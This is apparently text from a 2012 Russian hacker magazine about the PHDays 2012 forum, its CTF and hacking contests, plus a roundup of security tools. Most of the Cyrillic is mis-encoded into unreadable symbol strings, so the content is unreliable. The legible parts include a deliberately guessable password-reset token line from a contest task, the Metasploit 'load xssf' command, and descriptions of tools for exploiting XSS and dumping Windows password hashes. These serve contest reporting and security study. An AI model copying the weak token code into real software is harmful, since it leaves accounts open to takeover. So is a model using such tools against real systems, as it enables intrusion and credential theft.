G DL8 !G7GMNO JP PHDAYS? 7''-C+ %'36#%; -;6& 'A+$. "#($''-"#($; (/&%+' & ,6#@%; %',*51$; (%+,.: bit.ly/JYOk6P), ','-+$$' , 5A+*'0 *'=', A*' '"=#$&(#*'"; 1"&-=6#,&6& 6?%+@ &( ,#0;: "#($;: ,4+" HI. J#9 /;-'" — <*', 3'$+A$', A&,*' *+:$&A+,3&+ &,,6+%'/#$&), 3'*'";: -;6' $+0#6'. B"#*3' 3',$5,. $#&-'6++ (#1'0$&/9&:,). O"+/&, !5%,1&% "#,,3#(#6, 3#3 0'2$' &,1'6.-('/#*. 950; & /$+%")*. 1#3+*; $# 1+"/'0 5"'/$+ 0'%+6& OSI (Packet-in-Packet). Q?-'1;*$'+ &,,6+%'/#$&+ 1"+%,*#/&6& "+-)*# &( Elcomsoft — R0&*"&@ S36)"'/ & P$%"+@ I+6+$3'. 7()/ 1'156)"$;+ 0+$+%2+";

+

!"#$% 09 /164/ 2012 077!"#$% 09 /164/ 2012 077

PHDays 2012: !"! #$% &'(%?

!"#$%$&'" ($)&$*-+$,%- $ (&$&.*$%#" #$+#/&,.. 0 $&1.+-2.-3-- /4.,%5$5.6$ $#$6$ 40 4"6$5"#! 7"%8 *'6. &.25"&+/%. +. +"-,#$68#-9 ESX, +. +-9 *'6- 2.(/:"+' 5-&%/-.6#- +. *.2" FreeBSD, ($) #$%$&';- #&/%--6-,8 jail’' , /<25-;';- ,-,%";.;-.

)"*+,%-*'. CTF, /)%01+1**'. 0 )"2!"3 PHDays, -"4(56,0"1$ %$+1(7*%8% 4(%0". 9(%:"+!", *" !%$%)%. )"-214$,(,47 12 ,21*,$'3 !%2"*+,

-"*,2"(" (70,*5; <"4$7 &%(7=%8% Progress-Bar’", 8+1 *" /)%$>61*,, +053 +*1. $54%0"(%47 %8)%2*%1 !%(,<14$0% (;+1., 40>-"**'3 4 ,*?%)2"@,%**%. &1-%/"4*%4$7;. A"! , 0 !("44,<14!%2 CTF, %4*%0*%. -"+"<1. 5<"4$*,!%0 &'(% 0'>0,$7 5>-0,2%4$, 0 4,4$12"3 /)%$,0*,!%0 , /%(5<,$7 +%4$5/ ! 41!)1$*'2 !(;<"2, ,*+,0,+5"(7*'2 +(> !"6+%. !%2"*+'. B<"4$*,!, /")"((1(7*% )"&%$"(, *"+ /%,4!%2 5>-0,2%4$1. 4)"-5 0 <1$')13 41)0,4"3, 4%4$%>*,> !%$%)'3, " 4(1+%0"$1(7*%, , ,3 &"8, 21*>(,47 !"6+'1 *14!%(7!% <"4%0. C4*%0*'1 %<!, 5<"4$*,!, /%(5<"(, -" #!4/(5"-$"@,; *".+1**'3 ,2, 5>-0,2%4$1. *" 41)01)"3 !%2"*+-4%/1)*,!%0. D%!"-"$1(74$0%2 54/1=*%. #!4/(5"$"@,, >0(>(4> MD5-31=, /%4(1 +%&"0(1*,> !%$%)%8% 0 4!%),*8-4,4$125 !%2"*+1 *"<,4(>(,47 &"((' 0 -"0,4,2%4$, %$ 4(%6*%4$, -"+"*,>, 54$"*%0(1**%. %)8"*,-"$%)"2,. E4(, !"!%.-(,&% ,- 41)0,4%0 !%2"*+ &'( *1+%4$5/1* &%(11 />$, 2,*5$, !%2"*+1 *"<,4(>(,47 =$)"?*'1 &"(('. F41 <14$*%.

G"01$*'1 &"((' !%2"*+' 2%8(, /%(5<,$7 , -" )1=1*,1 -"+"*,. ,- -%*' 3"!-!014$" — %$+1(7*%. 41$,, 0 !%$%)%. *"3%+,(,47 41)01)' 4 5>-0,2'2, 41)0,4"2,. H$, -"+"*,> 5<"4$*,!, 2%8(, )1="$7 $%(7!% 21$%+%2 <1)*%8% >:,!", $% 14$7 (%!"(7*%8% +%4$5/" ! 4,4$12"2 5 *,3 *1 &'(%. 9")"(-(1(7*% -"+"*,> 2%8(, )1="$7 041 61(";:,1 4 (;&%8% !%*@" 401$" — +(> #$%8% &'( /%4$)%1* VPN-!"*"( +% #$%. 41$,.

I$%&' 5<"4$*,!, *1 -"4,6,0"(,47 *" 214$1, ,2 /)1+%-4$"0(>("47 0%-2%6*%4$7 /%(5<,$7 +%/%(*,$1(7*'1 &"((', -"*>0=,47 $"! *"-'0"12'2 dumpster diving,— !%)%<1 8%-0%)>, /%5/)"6*>$74> 0 +%&'<1 ,*?%)2"@,, 4$")'2 !"! 2,) /5$12. D(> #$%8% %)8"*,-"$%)' /%4$"0,(, /%-*"4$%>:125 %8)%2*'. /)%-)"<*'. &%!4, -"0"(1**'. )"4/1<"$!"2, *" A4. A)%21 (,4$%0 4 254%)*%. ,*?%)2"@,1., 2%6*% &'(% *".$, , &52"8, 4 $12, 4"2'2, «?("8"2,», -" !%$%)'1 *"-<,4(>(,47 %<!,.

G"&"0*'2 %$01$0(1*,12 %4*%0*%. (181*+' $"!61 &'(% -"+"*,1 «J")7 8%)'». H$% 2"!4,2"(7*% )1"(,4$,<*'. !%*!5)4 +(> /1*$14$1)%0: $,/%0%. /1),21$) 41$, 4)1+*1-4$"$,4$,<14!%. !%2/"*,, 4 5>-0,2'2, 01&-/),(%61*,>2, , )"-(,<*'2, 41)0,4"2,, -" 0412 #$,2 4!)'0"1$4> Microsoft Active Directory. G"+"<" 5<"4$*,!%0 — %&*")56,$7 5>-0,2%-4$, 0 4,4$12"3, 0%4/%(7-%0"$74> ,2, , 2"!4,2"(7*% +%(8%

5+1)6,0"$7 -"30"<1**'1 4,4$12'. A"!? D1(% 0 $%2, <$% /%4(1 -"30"$" 4,4$12' %+*%. ,- !%2"*+, @1/%<!, 5>-0,-2%4$1. /1)181*1),)5;$4>, , 5 !%2"*+' &'( 0'&%): (,&% /'$"$74> -"30"$,$7 4216*'1 4,4$12', (,&% /)%+%(6,$7 /%,4! 5>-0,2%4$1. 0 561 -"30"<1**%. 4,4$121. A 4(%05, 0)12> 5+1)6"*,> Active Directory &'(% 4"2'2 +%)%8,2. C*% , /%*>$*%, 01+7 +(> $%8%, <$%&' /)%014$, "$"!5 *" 4(56&5 !"$"(%8%0, $)1&%0"(%47 5+1)6,0"$7 4,4$12', )"4/%(%61*-*'1 *" /1)0%2 5)%0*1 (<,$". - /1),21$)1). F41 !"! 0 6,-*,...

F%/)1!, %6,+"*,>2 %)8"*,-"$%)%0, 5<"4$*,!, *1 )"--%=(,47 *" *%<7 /% 40%,2 %$1(>2, " /)%+%(6"(, )5&,$7-4> , )1="$7 -"+"*,>, %$(5<">47 /% 40%125 4%&4$01**%25 )"4/,4"*,; *" !%)%$!,. <"4%0%. 4%*. K" 0$%)%. +1*7 4$%(' 5<"4$*,!%0 &'(, &5!0"(7*% -"0"(1*' #*1)81$,-!"2, (!"61$4>, 2*%8,1 ,*%4$)"**'1 5<"4$*,!, %@1*,(, *"=, )%44,.4!,1 *"/,$!,). C+*%. ,- !%2"*+ 5+"(%47 4<,$1),$7 , /)%&)%4,$7 0*1=*,. $5**1(7, /%+!(;<,0 ! 5<"4$,; +%/%(*,$1(7*'3 &%.@%0. L*$1)14*%, 5-*"(, (, %& #$%2 %)8"*,-"$%)' , &'(, (, !"!,1-$% 4"*!@,,. 9%&1+,$1(12 CTF 4$"(" /,$1)4!"> !%2"*+" L33t More, !%$%)">, ! 4(%05, 525+),("47 *".$, 0 3%+1 4%)10*%0"*,. 0-day-5>-0,2%4$7 0 FreeBSD.

#"# &%'!'()* CTF?

+

CTF ),-./%)

PHDAYS EVERYWHERE=.&.66"68+$ ;"&$(&--<%-< (&$5$)-6-,8 ":" +. 20 (6$:.)#.9 ($ 5,";/ ;-&/. !. #.>)$? *'6- ,5$- )$#6.)', #$+#/&,', -+$1). ).>" 3"6'" CTF.

!"#$%

&'()* 09 /164/ 2012078

!"#" $#%$&'( #$)*)+(, #-%./ .* ()/01 ,'$.1 . 2'.3+4$ 3%./)%.4 #54%6 /%#7.1, $"# *)%./)4"(, 2')$".54($#8 94*#2)(%#("6:. ;(#94%%# 2'.,"%#, 5"# 3 %4/ 2'.%./)+. &5)(".4 /%#7.4 %)<. )3"#'0. =/4%%# ")/ , 324'304 3("'4".+(, 3 '4)+4 ( Raz0r’#/, %)2.()3<./ %4 #-.% $+)((%08 /)"4'.)+ -+, >&'%)+). ;% (#7+)(.+(, ')(($)*)"6 # $#%$&'(4 5&"6 2#-'#9%44.

«?4+6 &5)("%.$#3, ('4-. $#"#'01 90+ . ,, (#("#,+) 3# 3*+#/4 (24@.)+6%# 2#-7#"#3+4%%#8 (.("4/0 -.(")%@.#%%#7# 9)%$#3($#7# #9(+&>.3)%.,. A 54/ >4 #(#94%%#("6? ;'7)%.*)"#'0 2#-7#"#3.+. %)("#,B.8 9)%$#/)" ( %)("#,B./. $)'")/. . (24@.)+6%# 2#-%,"0/ 2'#@4((.%7#/ -+, 303#-) -4%47. C)$ 5"# $)>-08 &5)("%.$ 3 24'(24$".34 /#7 (')*& #B&"."6 '4*&+6")" (3#48 „')9#"0“, (%,3 ( $)'"0 >.304 -4%67. (!), $#"#'04 &-)+#(6 24'434(". %) (3#8 (54". D'&"#, %# $)$ E"# /#>%# 90+# (-4+)"6?

F) -4%6 -# -48("3) 3(4/ &5)("%.$)/ ')*-)+. G+4<$. ( .(1#-%.$)/. (.("4/0, 3 $#"#'01 %&>%# 90+# %)8". &,*3./#(".. H.$)$.1 SQL-.%I4$@.8, LFI/RFI . 2'#5.1 "')-.@.#%%01 -+, PHP &,*3./#("48 3 $#-4 %4 90+# — 2'.(&"("3#3)+. &,*3./#("., $#"#'04, 2# (+#3)/ #'7)%.*)"#'#3, 3("'45):"(, 3 1#-4 24%"4(") '4)+6%01 JK;. J+, 2'./4') 3(2#/%: &,*3./#("6 3 2'#@4-&'4 3#((")%#3+4%., 2)'#+,. H&>%# 90+# +.<6 #"2')3."6 *)2'#( %) (9'#( 2)'#+, . 9'&"."6 $#-, $#"#'08 74%4'.+(, (+4-&:B./ %41."'0/ #9')*#/:

$key = md5($login.rand(1, 250));

C)$./ %4/&-'4%0/ (2#(#9#/ /#>%# 90+# -#("&5)"6(, -# 5&>#7# )$$)&%"). D)>4"(,, ./4%%# E"#" 2'#("#8 9)7 (/#7+. %)8". 3(4 &5)("%.$.. L#%,"%#, 5"# 3'&5%&: E". &,*3./#(". %.$"# %4 E$(2+&)".'#3)+: 3 24'308 -4%6 $)>-08 20")+(, %)2.()"6 )3"#/)".54($.4 (2+#."0, ) ()/#4 .%"4'4(%#4 %)5)+#(6 3# 3"#'#8 -4%6. A(4/ &5)("%.$)/ 2'4-+)7)+#(6 %49#+6<#4 3'4/,, 5"#90 ( .(2#+6*#3)%.4/ %)8-4%%01 &,*3./#("48 (+."6 $)$ /#>%# 9#+6<4 -4%47 (# (54"#3 3 3.'"&)+6%#/ JK;. L'.54/ &,*3./#(". *)"')7.3)+. )$$)&%"0 %4 "#+6$# 3.'"&)+6%01 $+.4%"#3, %# . -'&7.1 &5)("%.$#3 $#%$&'(). A ."#74 24'3#4 /4("# *)%,+ 54+#34$ 2#- %.$#/ Gifts, 3"#'#4 — M+49 N4'9#3 . J./) N)("&1.%, ) "'4"64 -#(")+#(6 /%4».

K;OPQ;R DS$H

2)'#+48 -+, iOS, #%. '4<.+. 2#(/#"'4"6: 3 ")$#8 +. 94*#2)(%#(". 1')%,"(, 2)((0. ;$)*)+#(6, 5"# 2#5". 3(4 #%. %4 ("#," . 304-4%%#7# ,8@), ) /%#7.4 -)>4 1')%," $+:5 <.G'#3)%., 3 #"$'0"#/ 3.-4. =%"4-'4(%48<&: '4"'#(24$".3& 2)'#+6%#8 *)B."0 2'4-(")3.+ T+4$()%-' L4(+,$ (/%#7.4 47# *%):" $)$ Solar Designer), )3"#' +474%-)'%#7# password-$')$4') John the Ripper! K&-4/ %)-4,"6(,, 5"# (/#>4/ &3.-4"6 47# ('4-. 7#("48 %)<47# .%"4'36:. C4/) DDoS 3 .(2#+%4%.. T+4$()%-') O,/.%) .* Highload Lab, $)$ 3(47-), %4 "#+6$# 2'.$#3)+) 3%./)%.4, %# . "')-.@.#%%# 2'43')".+)(6 3 9#+6<&: (4((.: 3#2'#(#3-#"34"#3. H4 #9#<+. $#%G4'4%@.: . +:-., $#"#'04 *)%./):"(, '4(4'54/ 3.'&(#3. T+4$()%-' M#("43 .* Kaspersky Lab '4<.+ %4 ')(($)*03)"6 2'# 9),-%.("08 Duqu, ) 94* 2#-7#"#3$. 30-)+ *)13)"03):B&: ("')<.+$& 2'# Flame, $#"#'08 90+ #9%)'&>4% 9&$3)+6%# %)$)%&%4. A *)+ ( -#$+)-#/ U)<. V)"'#(#3) . W4%. X#-.#%#3) 2'# &,*3./#(". (/)'"-$)'" ( "#5$. *'4%., 9)%$#3($.1 "'#,%#3 90+# %4 2'#9."6(, — 2'.<+#(6 (/#"'4"6 %) E$')%4 3 9)'4. Y4-#' Z'#5$.% . A+)-./.' D'#2#"#3 2'4-(")3.+. %4#905%08 2#-1#- -+, )%)+.*) 9#"%4"#3. A/4("# '434'(.%7) 9#"#3 #%. )%)+.*.'&:" DNS-"')G.$ . +47$# #2'4-4+,:" 9#"#3 2# *)2'#()/ $ %4(&B4("3&:B./ -#/4%)/. L#+&5.+(, >.3#8 -#$+)- ( /%#>4("3#/ 2'./4'#3 .* >.*%.. S3+4$)"4+6%0/ #20"#/ #9%)'&>4%., . &("')%4%., &,*3./#("48 3 (4",1 "4+4$#//&%.$)@.#%%01 #24')"#'#3 2#-4+.+(, U4'748 M#'-485.$, "41%.54($.8 -.'4$"#' $#/2)%.. — #'7)%.*)"#') G#'&/) Positive Technologies. ;"+.5%08 -#$+)- 2'# XXE-)")$. ( -4/#%-("')@.48 0-day-(2+#.") 2'#5.")+ A#+#-, A#'#%@#3. D (+#3&, %)5.%)+(, 47# -#$+)- 3# 3"#'#8 -4%6 3 9 &"'), ., $#7-) /0 41)+. $ E"#/& 3'4/4%., -&/)+., 5"# 3 ")$&: ')%6 4-3) +. 2'.-4" /%#7# %)'#-). = 90+. 2'.,"%# &-.3+4%0: (3#9#-%01 /4(" 3 *)+4 2#5". %4 90+#. H4 /#7& %4 &2#/,%&"6 ")$>4 30("&2+4%.4 7+)3%#8 2'.7+)<4%%#8 *34*-0 K':() Q%)84'), #-%#7# .* ()/01 .*34("%01 (24@.)+.("#3 2# $'.2"#7')G... = 2&("6 -#-$+)- %4 90+ (.+6%# "41%.54($./, /0(+. +:-48 ")$#7# /)(<")9) 3(47-) (+&<)4<6 ( #(#90/ 3%./)%.4/.

X[UL[DC M+)3%#4 #"+.5.4 PHDays #" #905%01 $#%G4'4%@.8 — E"# %#%-("#2 )$".3%#("6. N"# "'49&4"(, #" 1)$4'($#8 $#%G4'4%@..? M+&9#$.4 "41%.54($.4 -#$+)-0? J)! \)$-$#%$&'(0 %) +:9#8 3$&( — 1#"6 #"9)3+,8. CTF? D)>4"(,, 324'304 (#'43%#3)%.4 90+# #'7)%.5%# .%"47'.'#3)%# 3 #(%#3%#8 .34%" (3 #"+.5.4 #" #905%#7# (@4%)'.,, $#7-) CTF-B.$. %4*)/4"%# >.3&" (3#48 >.*%6:, 5"#-"# ")/ $#30',, 3 &7#+$4). D#%$&'( (2+#."#3? H.$.") C)')$)%#3 2#$)*)+ 0-day -+, Windows XP, ) L)34+ Q&3)43 — 3 iOS. V%#7.4 ($42".54($. #"%#(.-+.(6 $ .-44 #9I4-.%."6 2#- #-%#8 $'0<48 «2.->)$.» . «G&"9#+-$.». H4 &34'4%0 2# 2#3#-& 24'301, %# "#, 5"# +:-., *)%./):B.4(, 2')$".54($#8 94*#2)(%#("6:, 2#+&5.+. /)((& G)%), /%#7#-/%#7# #9B4%.,, $+)((%04 -#$+)-0 . %424'4-)3)4/&: )"/#(G4'& 1)$4'-($#8 $#%G0, — %4" (#/%4%.8. = *) E"#, Positive Technologies . +.5%# 3(4 +:-., $#"#'04 2'.%./)+. &5)(".4 3 #'7)%.*)@.., 3)/ 9#+6<#8 '4(24$"! z

!"#$% 09 /164/ 2012 079!"#$% 09 /164/ 2012 079

PHDays 2012: !"! #$% &'(%?

)*)+, -, ./0 NG /1234$5"6 373 2 4%23$4!83 293:35" 1"&"2" 2 5%2%: ;%9:"$3. <4(8 2 !("448-=34!%> «)?%$3 5" (84» @="4$58!@ 5@A5% &'(% 5">$8 B6$C 9"D8%B393D"$=8!%2 2 (34@, $% @="4$58!": PHDays 5@A5% &'(% %&5"9@A8$C B%4$%655% B393:37"E78>46 B% $3998$%988 !%5;3935F88 %&G3!$ (#$% &'( =3(%23! 4 "!$825%> Wi-Fi $%=!%> D%-4$@B", 1"B@7355%> 5" Android-4:"9$;%53). H 931@(C$"$3 B% $3998$%988 Digital October &3I"(% 53:"(% (ED3>, 2 $%: =84(3 48:-B"$8=5'? D32@J3!, !%$%9'3 2 %D5%> 9@!3 D39A"(8 5"B9"2(355@E "5$355@, " 2 D9@I%> 53$&@! 4 1"B@7355': Kismet'%:, =$%&' %$-4(3D8$C 9"44$%6583 D% «(84'».

K, L.<M+N/O<0M)P )HQ)PR"44%2'3 @$3=!8 B"9%(3> %4$"E$46 4":%> B%B@(695%> $3:%> 2 85;%&31%B"45%4$8 1" B%4(3D-533 293:6, 8 %9I"581"$%9' !%5!@94" 93J8(8 D"$C 5"I(6D5@E !"9$85@ 9"1(8=5'? !98B$%-"(I%98$:%2 2 !%5!@943 Hash Runner. S="4$58!": &'(% B93D(%A35% 6573 9"1(8=5'? ?3J" D(6 21(%:". T98 B%D4=3$3 %=!%2 @=8$'2"(%4C !"! !%(8=34$2% 21(%:"55'? ?3J3>, $"! 8 8? 4(%A5%4$C. T392%3 :34$% 1"56(" !%:"5D" Teardrop, %$%&9"55"6 81 4%4$"2" Hashcat (9"19"-&%$=8!8 %D5%8:355%I% 43:3>4$2" 854$9@:35$%2), B98=3: %D85 81 @="4$58!%2 (Xandrel) 93J8( @="4$2%2"$C 2 !%5!@943 4":%(8=5% 8 @:@D98(46 1"56$C $93$C3 :34$%. H B3934=3$3 5" &"((' B98139' 93J8(8 11% 243? 1"D"=. )$:3$8:, =$% 53$9%5@$':8 %4$"(84C ?3J8 DES, phpbb3, ssha 8 WordNress. 0":': ="4$% 21(":'2"3:': %!"1"(46 "(I%98$: LAN Manager.

#&'#(%)*

GRAND THEFT DRONES="4$58!": B93D("I"(%4C :3533 =3: 1" B%(-="4" 1"?2"$8$C %D85 81 D2@? !2"D9%!%B$39%2 AR.Drone, @B9"2(3583 !%$%9': %4@734$2(63$46 4% 4:"9$;%5" =3931 Wi-Fi. <4(8 $' @A3 B93D-4$"28(, !"! B393?2"$'2"( $9";8! 8 B'$"(46 %$9323948$C B9%$%!%( 21"8:%D3>4$286, 4B3J@ %I%9=8$C: 34$C !@D" :3533 ?"9D!%95'> B@$C. T%D!(E=82J84C ! 25@$93553> $%=!3 D%4$@B" D32">4", (3I!% %&5"9@A82"3JC 53 1"!9'$'> B"9%(3: Telnet. T%(@=82 D%4$@B ! )0 @4$9%>4$2", =3931 iptables :%A5% &'(% 4D3("$C reject $%I% @4$9%>4$2", !%$%9%3 %4@734$2(6(% @B9"2(3583, 8 B%D!(E=8$C46 ! D9%5@ 4% 42%3I% $3(3;%5" 2 !"=34$23 B8(%$".

0UVN,+W H XY/MH !%5!@943 B%D 5"12"583: «0'I9"$C 2 678!» @="4$58!": 5@A5% &'(% 24!9'$C D2" 43>;" 4 RFID-1":!":8, 9"&%$"E78:8 5" 9"15'? ="4$%$"?, D(6 =3I% 5@A5% &'(% 81I%$%28$C D@&(8!"$ !"9$'. Z(6 9"&%$' 4 581!%="-4$%$5%> (125 !VF) 84B%(C1%2"(46 USB-98D39 ACR122U (bit.ly/ACR-122U), D@&(8!"$%9 KeyMaster PRO 4 RF (bit.ly/KeyMaster4) 8 :3$!8 5" &"13 =8B" T5557 (bit.ly/t5557). H'4%!%="4$%$5"6 :3$!" (13,56 RVF) B93D4$"2(6(" 4%&%> !"9$@ Mifare Classic 1K, " D@&(8!"$ 81I%$"2(82"(46 4 B%:%7CE !8$">4!%I% B3931"B84'2"3:%I% "5"(%I". M4$"$8, @4$9%>4$2%, !%$%9%3 1D34C :%A5% &'(% 84B%(C1%2"$C, :' 9"44:"$982"(8 2 B9%J(%: 5%:393 2 4$"$C3 «*"!394!8> =3:%D"5=8!».

-,./H,PM, NG O$% :%A3$ B%:3J"$C @:3(%:@ B35$34$39@ B9%234$8 @4B3J5@E "$"!@ 5" 23&-B98(%A3583, B@4!"> D"A3 1"787355%3 ;8(C$9%: &31%B"45%4$8? )D5"!% 2 #$%: !%5!@943 34$C 5E"54. M"AD'3 B6$C :85@$ @="4$58!":, 5" D3>4$286 !%$%9'? ="73 243I% 93"-I89%2"( WAF, B93D("I"(%4C 2'B8$C 50 :( !93B!%I% "(!%I%(6. , 34(8 !%5!@94 58!"! 53 @D"3$46 5"="$C (!"! %!"1"(%4C, 81-1" I(E!"2%I% 428$="), "(!%I%(C AD3$, " 198$3(8 2%!9@I !98="$: «-"(82">-!"!». T9%!"="55%3 @:3583 $9312% :'4(8$C 2 (E&%> 48$@"F88 B%!"1"( H%(%D6 H%9%5F%2, !4$"$8, 9"19"&%$=8! 42%3> B9%D285@$%> WAF'!8.

!"#$%

&'()* 09 /164/ 2012080

!"#$%#& «D1g1» '()*+#"*(, Digital Security (twitter.com/evdokimovds)

!"##$%&%!'(!%)* $%+'(,- (*."/$"! Scylla Imports Reconstruction — 012 31454-16 758 92::16;295<;48 16=54>? 4@A2B129 76@A29. (;:1B3@<;1 4C ;29?D, ;2 3E< 3:A<5 C6-92<961F A2A358B;2:1F. G6H A4I<1 :6@ 6912B, 92 9:<D AB2JB6@@6D 758 92::16;295<;48 4@A2B16 (ImpRec, CHimpREC, Imports Fixer 4 16H 765<<) <:1F ;<72:161H4, 4 2; B<I45 :7<561F :92K 4;-:1B3@<;1, 9 H212B2@ 4D ;< =37<1. ":2=<;;2:14:• 9:1B2<;;?K 76@A<B;• B<76H14B296;4< PE-:<H>4K;• B<76H14B296;4< H276;• AB69H6 IAT 4 OEP;• A277<BEH6 x86 4 x64;• A25;68 A277<BEH6 L;4H276;• A277<BEH6 A56J4;29

(9H5LM68 A56J4;? 21 ImpRec, M12 2:2-=<;;2 ><;;2);

• 2154M;2 B6=216<1 ;6 Windows 7.

.B2JB6@@6 B6:AB2:1B6;8<1:8 : 21HB?1?@4 4:D27;?@4 H276@4. ! H6M<:19< 74C6::<@=5<B6 4:A25FC3<1:8 AB2<H1 diStorm. "=B614 9;4@6-;4<, M12 Windows XP x64 4@<<1 ;<H212B?< =6J4 9 API, 16H M12 A27 012K "# A25;2:1FL 92::16-;2941F ;6 100% AB6945F;3L 16=54>3 4@A2B16 ;<92C@2E;2. /6CB6=21M4H 922=N< 9:8M<:H4 B<H2@<;73<1 4:A25FC2961F 9 H6M<:19< B6=2M<K :4:1<@? Windows x64, A27 H212B2K B6=216<1 :6@.

OG#.'-%$%,(P XSS !*)#$) # METASPLOIT The Cross-Site Scripting Framework (XSSF) — 4;:1B3@<;1 758 0H:A53616>44 XSS-38C94@2:1<K =25<< 5<JH4@ :A2:2=2@. .B2<H1 XSSF AB4C96; AB27<@2;:1B4B2961F B<65F;3L 2A6:;2:1F XSS-38C94@2:1<K, 3AB2N68 4D 0H:A53616>4L 72 AB2:12J2 9?=2B6 @2735<K 616H. XSSF A2C9258<1 :2C761F H6;65 :98C4 : ><5<9?@ =B63C<B2@ (21 XSS-38C94@2:14) 758 9?A25;<;48 765F;<KI4D 7<K:194K. .B2JB6@-@6 B<654C296;6 9 947< @27358 758 Metasploit 4 1<:;2 4;1<JB4B296;6 : ;4@, ;2 A2@4@2 012J2 2;6 4@<<1 4 :2=:19<;;?K 9<=-4;1<BQ<K:, J7< 212=B6E6<1:8 4;Q2B@6>48 2 AB20H:A53614B2-96;;?D ><58D:• IP-67B<:;• ;6C96;4< =B63C<B6;• 9<B:48 =B63C<B6;• ;654M4< cookie.

+56J276B8 4;1<JB6>44 : Metasploit Framework 92C@2E;2 5<JH2 C6A3:H61F =B63-C<B;?< 0H:A52K1? 4C <J2 :2:1696 M<B<C XSS-38C94@2:14. $6HE< =56J276B8 :2C7696<@2@3 XSSF Tunnel 92C@2E;2 7<K:192961F 21 :<::44 E<B19?. R58 C6A3:H6 @27358 ;<2=D274@6 H2@6;76:

load xssf

P S&%T, U$" $V R)'%' ! +/%-S)/) Browser Forensic Tool — AB2:12K 4 2M<;F @2N;?K 4;:1B3@<;1 758 4C95<M<;48 4;Q2B@6>44 2 7<K:1948D A25FC2961<58 4C 16H4D =B63C<B29, H6H Internet Explorer, Google Chrome, Mozilla Firefox, RockMelt, Comodo Dragon 4 Opera, 9:<J2 C6 ;<:H25FH2 :<H3;7. #;6M656 :2C76<1:8 ;6=2B H5LM<9?D :529, A2 H212B?@ AB24:D2741 A24:H 9 4:12B44 =B63C<B6. G2J76 4;:1B3@<;1 ;6D2741 3A2@4;6;4< H5LM<92J2 :5296, 2; 212=B6E6<1 URL 4 C6J25292H 2H;6.":2=<;;2:14:• =?:1B2< :H6;4B296;4< =25FI4;:196 4C-

9<:1;?D =B63C<B29;• @35F14A212M;2:1F;• 3AB695<;4< AB2Q458@4 H5LM<9?D :529,

A2C9258LN4@4 :2DB6;41F Q45F1B?;• :H6;4B296;4< 6BD4929 : 4:12B4<K;• 4@A2B1/0H:A2B1 B<C35F16129 9 CSV-Q2B@61;• :1614:14H6 A2 4:A25FC296;4L =B63C<B29

9 :4:1<@<.

.B2JB6@@6 A25;2:1FL 6:4;DB2;;6, 16H M12 ;4H6H ;< 9548<1 ;6 B6=213 A25FC2961<58 : =B63C<B2@ 9 AB2><::< :H6;4B296;48. "Q4>465F;?K :6K1 314541? A2:128;;2 5<E41, ;2 << 5<JH2 ;6K14 ;6 @;2J2M4:5<;;?D C<BH656D. (;1<B<:;2, M12 B6CB6=21M4H2@ 314541? 8958<1:8 :2C761<5F ;<=<C?C9<:1;2K AB2JB6@@? 75? :HB?1;2J2 3765<;;2J2 3AB695<;48 DarkComet RAT Tool.

1 2 3

,($*%: NtQueryURL: github.com/NtQuery/Scylla-#.$/"0: Windows

,($*%: Ludovic CourgnaudURL: code.google.com/p/xssf-#.$/"0: Windows/Linux

,($*%1: Jean-Pierre LESUEUR (DarkCoderSc)URL: www.darkcomet-rat.com/misctools.dc -#.$/"0: Windows

X-Tools!"#$ %&' ()&"*+ , +-+&,)+ ./)"0+!-"!$,

!"#$% 09 /164/ 2012 081

7 !"#$#" %$& #''$(%)*+,#& -(.)/+',)'"#

0123456 7894:90;0<7=0>::?4 @7::?4 01 WINDOWS Quarks PwDump — ,)*AB #,'"C!D(," ' )"-ECA"AD E)%)D %$& '-)C+ C+.$#F,AG "#/)* !F(",AG %+,,AG #. )/(C+H#),,)B '#'"(DA Windows. :+ "(E!I#B D)D(," /C)JC+DD+ /)-.*)$&(" #.*$(E+"K '$(%!LI#( "#/A +!"(,"#-M#E+H#),,AG %+,,AG:• NT/LM-G(N# $)E+$K,AG

/)$K.)*+"($(B + #'")C#L;• NT/LM-G(N# %)D(,,AG

/)$K.)*+"($(B + #'")C#L #. NTDS.dit;• E(N#C)*+,,A( %)D(,,A( !F(",A( %+,-

,A(;• BitLocker-#,M)CD+H#L,

GC+,#D!L * NTDS.dit.

O") /(C*AB #,'"C!D(,", E)")CAB ')F("+-(" * '(-( !P( #.*('",A( "(G,#E# # "(G,#E# #.*$(F(,#& %+,,AG #. BitLocker. QC)JC+DD+ /)%%(CP#*+(" %$& )-C+-)"E# M)CD+"A )" John the Ripper # L0phtCrack. 9+EP( /C#'!"-'"*!(" /)%%(CPE+ *'(G ,)*AG >R #. '(D(B'"*+ Windows: XP/2003/Vista/7/2008/8. :+ "(E!I#B D)D(," /C)JC+DD+ %(B'"*!(" ")$KE) ' C+-)F(B >R, ,) )-(I+L" # /)%%(CPE! #.*$(F(,#& +!-"(,"#M#E+H#),,AG %+,,AG )M$+B, ' )-C+.)* %#'E)*. >-C+"# *,#D+,#(, F") %$& C+-)"A !"#$#"A )-&.+"($K,A /C+*+ +%D#,#'"C+")C+ * H($(*)B '#'"(D(. 0,+F( ! ,(( ,#F(J) ,( *AB%(".

JavaSnoop — /C)JC+DD+, /C(%,+.,+F(,,+& %$& +,+$#.+ Java-/C#$)P(,#B. QC)JC+DD+ */(C*A( -A$+ /C(%'"+*$(,+ ,+ E),M(C(,-H## Black Hat 2010 E)D/+,#(B Aspect Security. QC)JC+DD+ /C)#.*)-%#" '"+"#F('E!L, %#,+D#F('E!L #,'"C!D(,"+H#L Java-/C#$)P(,#& ' H($KL +,+$#.+/D)%#M#E+H## C+-)"A /C)JC+DDA /C# ,+F+$( (( C+-)"A #$# /)'$( /C#')(%#,(,#& E !P( .+/!I(,,)B /C)JC+DD(, /C# S")D ,( "C(-!("'& #'G)%,AG E)%)*. 2.+#D)%(B'"*#( ' Jad /).*)$&(" 'C+.! 'D)"C("K %(E)D/#$#C)*+,,AB E)% /C#$)P(,#&. 8"#$#"+ /)-.*)$&(" C(+$#.)*+"K ,('E)$KE) /)$(.,AG "(G,#E, * ")D F#'$(:• /(C(G*+" $L-AG D(")%)* * *#C"!+$K,)B D+N#,(;• #.D(,(,#( /+C+D("C)* # *).*C+I+(DAG .,+F(,#B;• *,(%C(,#( /C)#.*)$K,)J) E)%+ * $L-)B D(")%;• /C)'D)"C (I( ,( '(C#+$#.)*+,,AG %+,,AG.

